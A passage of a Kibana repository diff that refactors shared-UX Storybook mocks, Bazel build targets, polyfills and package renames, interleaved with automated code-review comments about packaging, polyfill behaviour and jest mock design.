- platform: platformServiceFactory(params),
- data: dataServiceFactory(params as DataServiceFactoryConfig),
-});
-
-export type { DataServiceFactoryConfig } from './data';
diff --git a/packages/kbn-shared-ux-storybook/src/services/permissions.ts b/packages/kbn-shared-ux-storybook/src/services/permissions.ts
deleted file mode 100644
index 5d00ac3ee1cb2..0000000000000
--- a/packages/kbn-shared-ux-storybook/src/services/permissions.ts
+++ /dev/null
@@ -1,22 +0,0 @@
-/*
- * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
- * or more contributor license agreements. Licensed under the Elastic License
- * 2.0 and the Server Side Public License, v 1; you may not use this file except
- * in compliance with, at your election, the Elastic License 2.0 or the Server
- * Side Public License, v 1.
- */
-
-import { ServiceFactory, SharedUxUserPermissionsService } from '@kbn/shared-ux-services';
-
-/**
- * A factory function for creating a Storybook implementation of `SharedUxUserPermissionsService`.
- */
-export type SharedUxUserPermissionsServiceFactory = ServiceFactory;
-
-/**
- * A factory function for creating a Storybook implementation of `SharedUxUserPermissionsService`.
- */
-export const userPermissionsServiceFactory: SharedUxUserPermissionsServiceFactory = () => ({
- canCreateNewDataView: true,
- canAccessFleet: true,
-});
diff --git a/packages/kbn-shared-ux-storybook/src/services/platform.ts b/packages/kbn-shared-ux-storybook/src/services/platform.ts
deleted file mode 100644
index 2a1cb6c3ff42b..0000000000000
--- a/packages/kbn-shared-ux-storybook/src/services/platform.ts
+++ /dev/null
@@ -1,22 +0,0 @@
-/*
- * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
- * or more contributor license agreements. Licensed under the Elastic License
- * 2.0 and the Server Side Public License, v 1; you may not use this file except
- * in compliance with, at your election, the Elastic License 2.0 or the Server
- * Side Public License, v 1.
- */
-
-import { action } from '@storybook/addon-actions';
-import { ServiceFactory, SharedUxPlatformService } from '@kbn/shared-ux-services';
-
-/**
- * A factory function for creating a Storybook implementation of `SharedUxPlatformService`.
- */
-export type PlatformServiceFactory = ServiceFactory;
-
-/**
- * A factory function for creating a Storybook implementation of `SharedUxPlatformService`.
- */
-export const platformServiceFactory: PlatformServiceFactory = () => ({
- setIsFullscreen: action('setIsChromeVisible'),
-});
diff --git a/packages/kbn-test/BUILD.bazel b/packages/kbn-test/BUILD.bazel
index 700467a46db84..7094425f81f9f 100644
--- a/packages/kbn-test/BUILD.bazel
+++ b/packages/kbn-test/BUILD.bazel
@@ -32,7 +32,6 @@ NPM_MODULE_EXTRA_FILES = [
 "jest_integration_node/jest-preset.js",
 "jest_node/jest-preset.js",
 "jest.config.js",
- "README.md",
 "package.json",
 ]
diff --git a/packages/kbn-test/README.md b/packages/kbn-test/README.mdx
similarity index 90%
rename from packages/kbn-test/README.md
rename to packages/kbn-test/README.mdx
index 72fb5c3358ce7..5e52b68b7a0cb 100644
--- a/packages/kbn-test/README.md
+++ b/packages/kbn-test/README.mdx
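Review bot: After `- "README.md",` nothing re-adds the renamed `README.mdx` to NPM_MODULE_EXTRA_FILES, so the built @kbn/test npm module will ship without a README unless the mdx is meant to be consumed only by the dev-docs site (the rename to `.mdx` with front matter suggests that, but the diff does not say). If that is intentional, a one-line comment at the removal site would spare the next reader the question, e.g. `# README.mdx is rendered by the dev docs site and is deliberately not packaged`. If not, `"README.mdx",` belongs in the list in place of the removed entry.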
@@ -1,10 +1,17 @@ -Kibana Testing Library -====================== +--- +id: kibDevDocsOpsTest +slug: /kibana-dev-docs/ops/test +title: '@kbn/test' +description: A package provide ways to run tests +date: 2022-08-15 +tags: ['kibana', 'dev', 'contributor', 'operations', 'cli', 'dev', 'mode', 'test'] +--- + +# Kibana Testing Library The @kbn/test package provides ways to run tests. Currently only functional testing is provided by this library, with unit and other testing possibly added here. -Functional Testing -------------------- +## Functional Testing ### Dependencies @@ -12,14 +19,16 @@ Functional testing methods exist in the `src/functional_tests` directory. They d ### Exposed methods -#### runTests(configPaths: Array) +#### `runTests(configPaths: Array)` + For each config file specified in configPaths, starts Elasticsearch and Kibana once, runs tests specified in that config file, and shuts down Elasticsearch and Kibana once completed. (Repeats for every config file.) `configPaths`: array of strings, each an absolute path to a config file that looks like [this](../../test/functional/config.base.js), following the config schema specified [here](../../src/functional_test_runner/lib/config/schema.js). Internally the method that starts Elasticsearch comes from [kbn-es](../../packages/kbn-es). -#### startServers(configPath: string) +#### `startServers(configPath: string)` + Starts Elasticsearch and Kibana servers given a specified config. `configPath`: absolute path to a config file that looks like [this](../../test/functional/config.base.js), following the config schema specified [here](../../src/functional_test_runner/lib/config/schema.js). diff --git a/packages/kbn-ui-shared-deps-npm/BUILD.bazel b/packages/kbn-ui-shared-deps-npm/BUILD.bazel index 8f3823a56b2d9..94ea101c61003 100644 --- a/packages/kbn-ui-shared-deps-npm/BUILD.bazel +++ b/packages/kbn-ui-shared-deps-npm/BUILD.bazel 
@@ -50,7 +50,6 @@ RUNTIME_DEPS = [
 "@npm//react-router-dom",
 "@npm//react-router",
 "@npm//react",
- "@npm//regenerator-runtime",
 "@npm//rison-node",
 "@npm//rxjs",
 "@npm//styled-components",
@@ -87,7 +86,6 @@ TYPES_DEPS = [
 "@npm//react-is",
 "@npm//react-router",
 "@npm//react-router-dom",
- "@npm//regenerator-runtime",
 "@npm//rison-node",
 "@npm//rxjs",
 "@npm//styled-components",
diff --git a/packages/kbn-ui-shared-deps-npm/webpack.config.js b/packages/kbn-ui-shared-deps-npm/webpack.config.js
index ddcb71fdb2c86..8096e9ea6e429 100644
--- a/packages/kbn-ui-shared-deps-npm/webpack.config.js
+++ b/packages/kbn-ui-shared-deps-npm/webpack.config.js
@@ -34,7 +34,6 @@ module.exports = (_, argv) => {
 'kbn-ui-shared-deps-npm': [
 // polyfill code
 'core-js/stable',
- 'regenerator-runtime/runtime',
 'whatwg-fetch',
 'symbol-observable',
 // Parts of node-libs-browser that are used in many places across Kibana
@@ -50,30 +49,35 @@ module.exports = (_, argv) => {
 * node scripts/find_babel_runtime_helpers_in_use.js
 */
 '@babel/runtime/helpers/assertThisInitialized',
+ '@babel/runtime/helpers/asyncToGenerator',
 '@babel/runtime/helpers/classCallCheck',
 '@babel/runtime/helpers/classPrivateFieldGet',
 '@babel/runtime/helpers/classPrivateFieldSet',
+ '@babel/runtime/helpers/createClass',
+ '@babel/runtime/helpers/createForOfIteratorHelper',
 '@babel/runtime/helpers/createSuper',
 '@babel/runtime/helpers/defineProperty',
 '@babel/runtime/helpers/extends',
 '@babel/runtime/helpers/inherits',
+ '@babel/runtime/helpers/inheritsLoose',
 '@babel/runtime/helpers/interopRequireDefault',
 '@babel/runtime/helpers/interopRequireWildcard',
 '@babel/runtime/helpers/objectSpread2',
 '@babel/runtime/helpers/objectWithoutProperties',
 '@babel/runtime/helpers/objectWithoutPropertiesLoose',
 '@babel/runtime/helpers/slicedToArray',
- '@babel/runtime/helpers/toArray',
+ '@babel/runtime/helpers/taggedTemplateLiteralLoose',
 '@babel/runtime/helpers/toConsumableArray',
 '@babel/runtime/helpers/typeof',
 '@babel/runtime/helpers/wrapNativeSuper',
+ '@babel/runtime/regenerator',
 // modules from npm
 '@elastic/charts',
 '@elastic/eui',
+ '@elastic/eui/optimize/es/services',
+ '@elastic/eui/optimize/es/services/format',
 '@elastic/eui/dist/eui_charts_theme',
- '@elastic/eui/lib/services',
- '@elastic/eui/lib/services/format',
 '@elastic/eui/dist/eui_theme_light.json',
 '@elastic/eui/dist/eui_theme_dark.json',
 '@elastic/numeral',
diff --git a/packages/kbn-ui-shared-deps-src/BUILD.bazel b/packages/kbn-ui-shared-deps-src/BUILD.bazel
index 18d50fdc05e63..db8d6c64fb6db 100644
--- a/packages/kbn-ui-shared-deps-src/BUILD.bazel
+++ b/packages/kbn-ui-shared-deps-src/BUILD.bazel
@@ -27,7 +27,7 @@ NPM_MODULE_EXTRA_FILES = [
 ]
 RUNTIME_DEPS = [
- "//packages/elastic-safer-lodash-set",
+ "//packages/kbn-safer-lodash-set",
 "//packages/kbn-analytics",
 "//packages/kbn-babel-preset",
 "//packages/kbn-datemath",
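Review bot: `'@babel/runtime/regenerator'` is appended to a list that the comment above describes as produced by `node scripts/find_babel_runtime_helpers_in_use.js`, and its path is not under `helpers/`, so the next time someone regenerates the list from that script the entry may be dropped without anyone noticing (inferred; the script itself is not in this diff). A comment on the line would protect it, e.g. `// not a helper: the regenerator runtime imported by transpiled async/generator code, keep when regenerating the list above`. The same applies to the `@elastic/eui/optimize/es/services` entries replacing `lib/services`: they are deep imports into a build-specific path, and a one-line note on why that variant is required would stop a future EUI bump from reverting them.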
@@ -41,7 +41,7 @@ RUNTIME_DEPS = [
 ]
 TYPES_DEPS = [
- "//packages/elastic-safer-lodash-set:npm_module_types",
+ "//packages/kbn-safer-lodash-set:npm_module_types",
 "//packages/kbn-analytics:npm_module_types",
 "//packages/kbn-datemath:npm_module_types",
 "//packages/kbn-i18n:npm_module_types",
diff --git a/packages/kbn-ui-shared-deps-src/src/definitions.js b/packages/kbn-ui-shared-deps-src/src/definitions.js
index 3e783d99b62cf..759b1bee856d2 100644
--- a/packages/kbn-ui-shared-deps-src/src/definitions.js
+++ b/packages/kbn-ui-shared-deps-src/src/definitions.js
@@ -75,7 +75,7 @@ const externals = {
 tslib: '__kbnSharedDeps__.TsLib',
 '@kbn/analytics': '__kbnSharedDeps__.KbnAnalytics',
 '@kbn/std': '__kbnSharedDeps__.KbnStd',
- '@elastic/safer-lodash-set': '__kbnSharedDeps__.SaferLodashSet',
+ '@kbn/safer-lodash-set': '__kbnSharedDeps__.SaferLodashSet',
 'rison-node': '__kbnSharedDeps__.RisonNode',
 history: '__kbnSharedDeps__.History',
 classnames: '__kbnSharedDeps__.Classnames',
diff --git a/packages/kbn-ui-shared-deps-src/src/entry.js b/packages/kbn-ui-shared-deps-src/src/entry.js
index bc521a2d72ecc..233872bacff58 100644
--- a/packages/kbn-ui-shared-deps-src/src/entry.js
+++ b/packages/kbn-ui-shared-deps-src/src/entry.js
@@ -39,8 +39,8 @@ export const RxjsOperators = require('rxjs/operators'); export const ElasticNumeral = require('@elastic/numeral'); export const ElasticCharts = require('@elastic/charts'); export const ElasticEui = require('@elastic/eui'); -export const ElasticEuiLibServices = require('@elastic/eui/lib/services'); -export const ElasticEuiLibServicesFormat = require('@elastic/eui/lib/services/format'); +export const ElasticEuiLibServices = require('@elastic/eui/optimize/es/services'); +export const ElasticEuiLibServicesFormat = require('@elastic/eui/optimize/es/services/format'); export const ElasticEuiChartsTheme = require('@elastic/eui/dist/eui_charts_theme'); export const KbnDatemath = require('@kbn/datemath'); export const ReactBeautifulDnD = require('react-beautiful-dnd'); @@ -55,7 +55,7 @@ export const Fflate = { unzlibSync, strFromU8 }; export const TsLib = require('tslib'); export const KbnAnalytics = require('@kbn/analytics'); export const KbnStd = require('@kbn/std'); -export const SaferLodashSet = require('@elastic/safer-lodash-set'); +export const SaferLodashSet = require('@kbn/safer-lodash-set'); export const RisonNode = require('rison-node'); export const History = require('history'); export const Classnames = require('classnames'); diff --git a/packages/kbn-ui-shared-deps-src/src/polyfills.js b/packages/kbn-ui-shared-deps-src/src/polyfills.js index a9ec32023f2bf..cc8e1f9b75d5c 100644 --- a/packages/kbn-ui-shared-deps-src/src/polyfills.js +++ b/packages/kbn-ui-shared-deps-src/src/polyfills.js @@ -7,7 +7,7 @@ */ require('core-js/stable'); -require('regenerator-runtime/runtime'); +require('@babel/runtime/regenerator'); if (typeof window.Event === 'object') { // IE11 doesn't support unknown event types, required by react-use diff --git a/packages/shared-ux/avatar/solution/src/solution_avatar.stories.tsx b/packages/shared-ux/avatar/solution/src/solution_avatar.stories.tsx index b47ff7c837f24..f7dca09fc8b1f 100644 
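Review bot: Replacing `require('regenerator-runtime/runtime')` with `require('@babel/runtime/regenerator')` in polyfills.js changes what the polyfill guarantees, not just where it comes from: the former unconditionally installs the `regeneratorRuntime` global that older transpiled output references, whereas `@babel/runtime/regenerator` only does whatever the regenerator copy bundled with the pinned `@babel/runtime` does, and recent versions of that package ship a regenerator that no longer defines the global. Worth confirming against the installed `@babel/runtime` version that nothing served through the shared deps still resolves `regeneratorRuntime` as a free global. A short why-comment, e.g. `// regenerator now comes from @babel/runtime (also listed in the shared-deps externals) rather than regenerator-runtime directly`, would record the reason for the swap.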
--- a/packages/shared-ux/avatar/solution/src/solution_avatar.stories.tsx +++ b/packages/shared-ux/avatar/solution/src/solution_avatar.stories.tsx @@ -10,7 +10,7 @@ import React from 'react'; import { KibanaSolutionAvatar, IconTypeProps, KnownSolutionProps } from './solution_avatar'; export default { - title: 'Solution Avatar', + title: 'Avatar/Solution', description: 'A wrapper around EuiAvatar, specifically to stylize Elastic Solutions', }; @@ -24,11 +24,11 @@ const argTypes = { type KnownSolutionParams = Pick; -export const SolutionAvatar = (params: KnownSolutionParams) => { +export const SolutionType = (params: KnownSolutionParams) => { return ; }; -SolutionAvatar.argTypes = { +SolutionType.argTypes = { name: { control: 'select', options: ['Cloud', 'Elastic', 'Kibana', 'Observability', 'Security', 'Enterprise Search'], @@ -39,11 +39,11 @@ SolutionAvatar.argTypes = { type IconTypeParams = Pick; -export const IconTypeAvatar = (params: IconTypeParams) => { +export const IconType = (params: IconTypeParams) => { return ; }; -IconTypeAvatar.argTypes = { +IconType.argTypes = { iconType: { control: 'select', options: [ diff --git a/packages/shared-ux/button/exit_full_screen/mocks/BUILD.bazel b/packages/shared-ux/button/exit_full_screen/mocks/BUILD.bazel index cd88ae0f1fe27..50a3e109546cd 100644 --- a/packages/shared-ux/button/exit_full_screen/mocks/BUILD.bazel +++ b/packages/shared-ux/button/exit_full_screen/mocks/BUILD.bazel @@ -10,8 +10,17 @@ SOURCE_FILES = glob( "src/**/*.ts", ], exclude = [ + "**/*.config.js", + "**/*.mock.*", "**/*.test.*", "**/*.stories.*", + "**/__snapshots__", + "**/integration_tests", + "**/mocks", + "**/scripts", + "**/storybook", + "**/test_fixtures", + "**/test_helpers", ], ) @@ -38,6 +47,7 @@ NPM_MODULE_EXTRA_FILES = [ # eg. "@npm//lodash" RUNTIME_DEPS = [ "@npm//@storybook/addon-actions", + "@npm//react", "//packages/shared-ux/storybook/mock", ] 
@@ -53,6 +63,7 @@ RUNTIME_DEPS = [ TYPES_DEPS = [ "@npm//@types/node", "@npm//@types/jest", + "@npm//@types/react", "@npm//@storybook/addon-actions", "//packages/shared-ux/button/exit_full_screen/types:npm_module_types", "//packages/shared-ux/storybook/mock:npm_module_types", @@ -65,6 +76,14 @@ jsts_transpiler( root_input_dir = "src", ) +jsts_transpiler( + name = "target_web", + srcs = SRCS, + build_pkg_name = package_name(), + root_input_dir = "src", + web = True, +) + ts_config( name = "tsconfig", src = "tsconfig.json", @@ -90,7 +109,7 @@ ts_project( js_library( name = PKG_DIRNAME, srcs = NPM_MODULE_EXTRA_FILES, - deps = RUNTIME_DEPS + [":target_node"], + deps = RUNTIME_DEPS + [":target_node", ":target_web"], package_name = PKG_REQUIRE_NAME, visibility = ["//visibility:public"], ) diff --git a/packages/shared-ux/button/exit_full_screen/mocks/package.json b/packages/shared-ux/button/exit_full_screen/mocks/package.json index 490d136049e1a..1ce5731e7bee3 100644 --- a/packages/shared-ux/button/exit_full_screen/mocks/package.json +++ b/packages/shared-ux/button/exit_full_screen/mocks/package.json @@ -3,5 +3,6 @@ "private": true, "version": "1.0.0", "main": "./target_node/index.js", + "browser": "./target_web/index.js", "license": "SSPL-1.0 OR Elastic License 2.0" } \ No newline at end of file diff --git a/packages/shared-ux/button/exit_full_screen/mocks/tsconfig.json b/packages/shared-ux/button/exit_full_screen/mocks/tsconfig.json index 894f01d3220e9..dc96ec41f9035 100644 --- a/packages/shared-ux/button/exit_full_screen/mocks/tsconfig.json +++ b/packages/shared-ux/button/exit_full_screen/mocks/tsconfig.json @@ -9,10 +9,12 @@ "stripInternal": false, "types": [ "jest", - "node" + "node", + "react" ] }, "include": [ - "src/**/*" + "**/*.ts", + "**/*.tsx", ] } diff --git a/packages/shared-ux/card/no_data/impl/src/no_data_card.stories.tsx b/packages/shared-ux/card/no_data/impl/src/no_data_card.stories.tsx index 5c7b1a57c11f2..8574b31da792a 100644 
--- a/packages/shared-ux/card/no_data/impl/src/no_data_card.stories.tsx +++ b/packages/shared-ux/card/no_data/impl/src/no_data_card.stories.tsx @@ -11,8 +11,7 @@ import React from 'react'; import { NoDataCardStorybookMock } from '@kbn/shared-ux-card-no-data-mocks'; import type { NoDataCardStorybookParams } from '@kbn/shared-ux-card-no-data-mocks'; -import { NoDataCard as Component } from './no_data_card.component'; -import { NoDataCard as ConnectedComponent } from './no_data_card'; +import { NoDataCard } from './no_data_card'; import { NoDataCardProvider } from './services'; import mdx from '../README.mdx'; @@ -28,21 +27,14 @@ export default { }; const mock = new NoDataCardStorybookMock(); - const argTypes = mock.getArgumentTypes(); -export const NoDataCard = (params: NoDataCardStorybookParams) => { +export const Card = (params: NoDataCardStorybookParams) => { return ( - + ); }; -NoDataCard.argTypes = argTypes; - -export const NoDataCardComponent = (params: NoDataCardStorybookParams) => { - return ; -}; - -NoDataCardComponent.argTypes = argTypes; +Card.argTypes = argTypes; diff --git a/packages/shared-ux/card/no_data/mocks/BUILD.bazel b/packages/shared-ux/card/no_data/mocks/BUILD.bazel index dbfc44a31b864..3aec9c86207c9 100644 --- a/packages/shared-ux/card/no_data/mocks/BUILD.bazel +++ b/packages/shared-ux/card/no_data/mocks/BUILD.bazel @@ -10,8 +10,17 @@ SOURCE_FILES = glob( "src/**/*.ts", ], exclude = [ + "**/*.config.js", + "**/*.mock.*", "**/*.test.*", "**/*.stories.*", + "**/__snapshots__", + "**/integration_tests", + "**/mocks", + "**/scripts", + "**/storybook", + "**/test_fixtures", + "**/test_helpers", ], ) @@ -39,6 +48,8 @@ NPM_MODULE_EXTRA_FILES = [ RUNTIME_DEPS = [ "@npm//@storybook/addon-actions", "@npm//deepmerge", + "@npm//lodash", + "@npm//react", "//packages/shared-ux/link/redirect_app/mocks", "//packages/shared-ux/storybook/mock", ] 
@@ -53,13 +64,15 @@ RUNTIME_DEPS = [ # # References to NPM packages work the same as RUNTIME_DEPS TYPES_DEPS = [ - "@npm//@types/node", - "@npm//@types/jest", "@npm//@storybook/addon-actions", + "@npm//@types/jest", + "@npm//@types/lodash", + "@npm//@types/node", + "@npm//@types/react", "@npm//deepmerge", - "//packages/shared-ux/storybook/mock:npm_module_types", - "//packages/shared-ux/link/redirect_app/mocks:npm_module_types", "//packages/shared-ux/card/no_data/types:npm_module_types", + "//packages/shared-ux/link/redirect_app/mocks:npm_module_types", + "//packages/shared-ux/storybook/mock:npm_module_types", ] jsts_transpiler( @@ -69,6 +82,14 @@ jsts_transpiler( root_input_dir = "src", ) +jsts_transpiler( + name = "target_web", + srcs = SRCS, + build_pkg_name = package_name(), + root_input_dir = "src", + web = True, +) + ts_config( name = "tsconfig", src = "tsconfig.json", @@ -94,7 +115,7 @@ ts_project( js_library( name = PKG_DIRNAME, srcs = NPM_MODULE_EXTRA_FILES, - deps = RUNTIME_DEPS + [":target_node"], + deps = RUNTIME_DEPS + [":target_node", ":target_web"], package_name = PKG_REQUIRE_NAME, visibility = ["//visibility:public"], ) diff --git a/packages/shared-ux/card/no_data/mocks/package.json b/packages/shared-ux/card/no_data/mocks/package.json index d9f12c7e81fcd..10380b879954c 100644 --- a/packages/shared-ux/card/no_data/mocks/package.json +++ b/packages/shared-ux/card/no_data/mocks/package.json @@ -3,5 +3,6 @@ "private": true, "version": "1.0.0", "main": "./target_node/index.js", + "browser": "./target_web/index.js", "license": "SSPL-1.0 OR Elastic License 2.0" } \ No newline at end of file diff --git a/packages/shared-ux/card/no_data/mocks/src/jest.ts b/packages/shared-ux/card/no_data/mocks/src/jest.ts index bf8ac47239bcf..9a89d0cd3b747 100644 --- a/packages/shared-ux/card/no_data/mocks/src/jest.ts +++ b/packages/shared-ux/card/no_data/mocks/src/jest.ts 
@@ -5,7 +5,10 @@ * in compliance with, at your election, the Elastic License 2.0 or the Server * Side Public License, v 1. */ + import deepmerge from 'deepmerge'; +import { isPlainObject } from 'lodash'; + import type { NoDataCardServices, NoDataCardKibanaDependencies, @@ -43,7 +46,7 @@ export const getKibanaDependenciesMock = ( const integrations = params.canAccessFleet !== undefined ? params.canAccessFleet : defaultParams.canAccessFleet; - return deepmerge( + const result = deepmerge( { coreStart: { http: { @@ -60,6 +63,11 @@ export const getKibanaDependenciesMock = ( }, }, }, - getRedirectAppLinksKibanaDependenciesMock() + getRedirectAppLinksKibanaDependenciesMock(), + { + isMergeableObject: isPlainObject, + } ); + + return result; }; diff --git a/packages/shared-ux/card/no_data/mocks/tsconfig.json b/packages/shared-ux/card/no_data/mocks/tsconfig.json index 894f01d3220e9..dc96ec41f9035 100644 --- a/packages/shared-ux/card/no_data/mocks/tsconfig.json +++ b/packages/shared-ux/card/no_data/mocks/tsconfig.json @@ -9,10 +9,12 @@ "stripInternal": false, "types": [ "jest", - "node" + "node", + "react" ] }, "include": [ - "src/**/*" + "**/*.ts", + "**/*.tsx", ] } diff --git a/packages/shared-ux/link/redirect_app/impl/src/redirect_app_links.test.tsx b/packages/shared-ux/link/redirect_app/impl/src/redirect_app_links.test.tsx index 6342f9f6e1f6a..56a6e1b4f7494 100644 --- a/packages/shared-ux/link/redirect_app/impl/src/redirect_app_links.test.tsx +++ b/packages/shared-ux/link/redirect_app/impl/src/redirect_app_links.test.tsx 
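Review bot: The `isMergeableObject: isPlainObject` option added in the last hunk changes deepmerge's default semantics and deserves a why-comment, since it is not obvious from the call: anything that is not a plain object (class instances such as the Observable returned by `getRedirectAppLinksKibanaDependenciesMock()`, `jest.fn()` spies, and arrays) is now taken by reference from the winning side instead of being cloned or, for arrays, concatenated. Something like `// isPlainObject: keep jest.fn() spies, Observables and arrays by reference instead of deep-cloning/merging them` above the options object would make the intent explicit. The `const result = deepmerge(...)` followed by `return result;` adds nothing over returning the call directly. `getKibanaDependenciesMock` begins above this hunk.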
@@ -10,10 +10,14 @@ import React, { MouseEvent } from 'react'; import { mount as enzymeMount, ReactWrapper } from 'enzyme'; +import { + getRedirectAppLinksKibanaDependenciesMock, + getRedirectAppLinksServicesMock, +} from '@kbn/shared-ux-link-redirect-app-mocks'; + import { RedirectAppLinksKibanaProvider, RedirectAppLinksProvider } from './services'; import { RedirectAppLinks } from './redirect_app_links.container'; import { RedirectAppLinks as ComposedWrapper } from './redirect_app_links'; -import { Observable } from 'rxjs'; export type UnmountCallback = () => void; export type MountPoint = (element: T) => UnmountCallback; @@ -251,21 +255,8 @@ describe('RedirectAppLinks', () => { navigateToUrl.mockReset(); }); - const kibana = { - coreStart: { - application: { - currentAppId$: new Observable((subscriber) => { - subscriber.next('123'); - }), - navigateToUrl, - }, - }, - }; - - const services = { - currentAppId: 'abc123', - navigateToUrl, - }; + const kibana = getRedirectAppLinksKibanaDependenciesMock({ navigateToUrl }); + const services = getRedirectAppLinksServicesMock({ navigateToUrl }); const provider = (node: React.ReactElement) => enzymeMount({node}); diff --git a/packages/shared-ux/link/redirect_app/mocks/BUILD.bazel b/packages/shared-ux/link/redirect_app/mocks/BUILD.bazel index f0607a798c833..2b28f97f2f639 100644 --- a/packages/shared-ux/link/redirect_app/mocks/BUILD.bazel +++ b/packages/shared-ux/link/redirect_app/mocks/BUILD.bazel @@ -8,10 +8,20 @@ PKG_REQUIRE_NAME = "@kbn/shared-ux-link-redirect-app-mocks" SOURCE_FILES = glob( [ "src/**/*.ts", + "src/**/*.tsx", ], exclude = [ + "**/*.config.js", + "**/*.mock.*", "**/*.test.*", "**/*.stories.*", + "**/__snapshots__", + "**/integration_tests", + "**/mocks", + "**/scripts", + "**/storybook", + "**/test_fixtures", + "**/test_helpers", ], ) 
@@ -37,6 +47,7 @@ NPM_MODULE_EXTRA_FILES = [ # "@npm//name-of-package" # eg. "@npm//lodash" RUNTIME_DEPS = [ + "@npm//react", "@npm//@storybook/addon-actions", "@npm//rxjs", "//packages/shared-ux/storybook/mock", @@ -52,6 +63,9 @@ RUNTIME_DEPS = [ # # References to NPM packages work the same as RUNTIME_DEPS TYPES_DEPS = [ + "@npm//@types/node", + "@npm//@types/jest", + "@npm//@types/react", "@npm//@storybook/addon-actions", "@npm//rxjs", "//packages/shared-ux/link/redirect_app/types", @@ -65,6 +79,14 @@ jsts_transpiler( root_input_dir = "src", ) +jsts_transpiler( + name = "target_web", + srcs = SRCS, + build_pkg_name = package_name(), + root_input_dir = "src", + web = True, +) + ts_config( name = "tsconfig", src = "tsconfig.json", @@ -90,7 +112,7 @@ ts_project( js_library( name = PKG_DIRNAME, srcs = NPM_MODULE_EXTRA_FILES, - deps = RUNTIME_DEPS + [":target_node"], + deps = RUNTIME_DEPS + [":target_node", ":target_web"], package_name = PKG_REQUIRE_NAME, visibility = ["//visibility:public"], ) diff --git a/packages/shared-ux/link/redirect_app/mocks/jest.config.js b/packages/shared-ux/link/redirect_app/mocks/jest.config.js index 6f1b6fd89f35e..ac5f8e5dcf92f 100644 --- a/packages/shared-ux/link/redirect_app/mocks/jest.config.js +++ b/packages/shared-ux/link/redirect_app/mocks/jest.config.js @@ -7,7 +7,7 @@ */ module.exports = { - preset: '@kbn/test/jest_node', + preset: '@kbn/test', rootDir: '../../../../..', roots: ['/packages/shared-ux/link/redirect_app/mocks'], }; diff --git a/packages/shared-ux/link/redirect_app/mocks/package.json b/packages/shared-ux/link/redirect_app/mocks/package.json index 2281680755a9c..adf441fb3d134 100644 --- a/packages/shared-ux/link/redirect_app/mocks/package.json +++ b/packages/shared-ux/link/redirect_app/mocks/package.json @@ -3,5 +3,6 @@ "private": true, "version": "1.0.0", "main": "./target_node/index.js", + "browser": "./target_web/index.js", "license": "SSPL-1.0 OR Elastic License 2.0" -} \ No newline at end of file +} 
diff --git a/packages/shared-ux/link/redirect_app/mocks/src/jest.ts b/packages/shared-ux/link/redirect_app/mocks/src/jest.ts index 57e6650d17752..1af5aa6e72a11 100644 --- a/packages/shared-ux/link/redirect_app/mocks/src/jest.ts +++ b/packages/shared-ux/link/redirect_app/mocks/src/jest.ts @@ -6,31 +6,53 @@ * Side Public License, v 1. */ -import { Subject } from 'rxjs'; +import { Observable } from 'rxjs'; import { RedirectAppLinksServices, RedirectAppLinksKibanaDependencies, } from '@kbn/shared-ux-link-redirect-app-types'; +type Params = Pick; + +const defaultParams: Params = { + navigateToUrl: jest.fn(), +}; + /** * Returns the Jest-compatible service abstractions for the `NoDataCard` Provider. */ -export const getRedirectAppLinksServicesMock = () => { +export const getRedirectAppLinksServicesMock = ( + params?: Partial +): RedirectAppLinksServices => { + const navigateToUrl = + params && params.navigateToUrl !== undefined + ? params.navigateToUrl + : defaultParams.navigateToUrl; + const services: RedirectAppLinksServices = { - navigateToUrl: jest.fn(), + navigateToUrl, currentAppId: 'currentAppId', }; return services; }; -export const getRedirectAppLinksKibanaDependenciesMock = (): RedirectAppLinksKibanaDependencies => { +export const getRedirectAppLinksKibanaDependenciesMock = ( + params?: Partial +): RedirectAppLinksKibanaDependencies => { + const navigateToUrl = + params && params.navigateToUrl !== undefined + ? params.navigateToUrl + : defaultParams.navigateToUrl; + return { coreStart: { application: { - currentAppId$: new Subject(), - navigateToUrl: jest.fn(), + currentAppId$: new Observable((subscriber) => { + subscriber.next('currentAppId'); + }), + navigateToUrl, }, }, }; diff --git a/packages/shared-ux/link/redirect_app/mocks/tsconfig.json b/packages/shared-ux/link/redirect_app/mocks/tsconfig.json index 041c59b490ec0..dc96ec41f9035 100644 --- a/packages/shared-ux/link/redirect_app/mocks/tsconfig.json 
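Review bot: `defaultParams.navigateToUrl` is a single `jest.fn()` created at module load, so every test that calls `getRedirectAppLinksServicesMock()` or `getRedirectAppLinksKibanaDependenciesMock()` without supplying its own mock shares one spy, and recorded calls leak between tests unless each one remembers to reset it. Creating the default per call removes that shared state and also collapses the duplicated `params && params.navigateToUrl !== undefined ? … : …` into `const navigateToUrl = params?.navigateToUrl ?? jest.fn();` in both functions, making `defaultParams` unnecessary. The existing doc comment above `getRedirectAppLinksServicesMock` still says "for the `NoDataCard` Provider" and should say "for the `RedirectAppLinks` Provider"; `getRedirectAppLinksKibanaDependenciesMock` has no doc comment at all. The type arguments on `Pick` and `Partial` look like they were lost in rendering rather than in the source, so I have assumed `Pick<RedirectAppLinksServices, 'navigateToUrl'>` and `Partial<Params>`.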
+++ b/packages/shared-ux/link/redirect_app/mocks/tsconfig.json @@ -10,9 +10,11 @@ "types": [ "jest", "node", + "react" ] }, "include": [ - "src/**/*" + "**/*.ts", + "**/*.tsx", ] } diff --git a/packages/shared-ux/page/analytics_no_data/impl/src/analytics_no_data_page.stories.tsx b/packages/shared-ux/page/analytics_no_data/impl/src/analytics_no_data_page.stories.tsx index 0e6a4261c8c2d..5c9c5923bfdc6 100644 --- a/packages/shared-ux/page/analytics_no_data/impl/src/analytics_no_data_page.stories.tsx +++ b/packages/shared-ux/page/analytics_no_data/impl/src/analytics_no_data_page.stories.tsx @@ -7,7 +7,6 @@ */ import React from 'react'; -import { action } from '@storybook/addon-actions'; import { AnalyticsNoDataPageStorybookMock } from '@kbn/shared-ux-page-analytics-no-data-mocks'; import type { AnalyticsNoDataPageStorybookParams } from '@kbn/shared-ux-page-analytics-no-data-mocks'; @@ -18,7 +17,7 @@ import mdx from '../README.mdx'; const mock = new AnalyticsNoDataPageStorybookMock(); export default { - title: 'No Data/Analytics Page', + title: 'No Data/Page/Kibana', description: 'An Analytics-specific version of KibanaNoDataPage.', parameters: { docs: { @@ -27,7 +26,7 @@ export default { }, }; -export const AnalyticsNoDataPage = (params: AnalyticsNoDataPageStorybookParams) => { +export const Analytics = (params: AnalyticsNoDataPageStorybookParams) => { return ( @@ -35,22 +34,4 @@ export const AnalyticsNoDataPage = (params: AnalyticsNoDataPageStorybookParams) ); }; 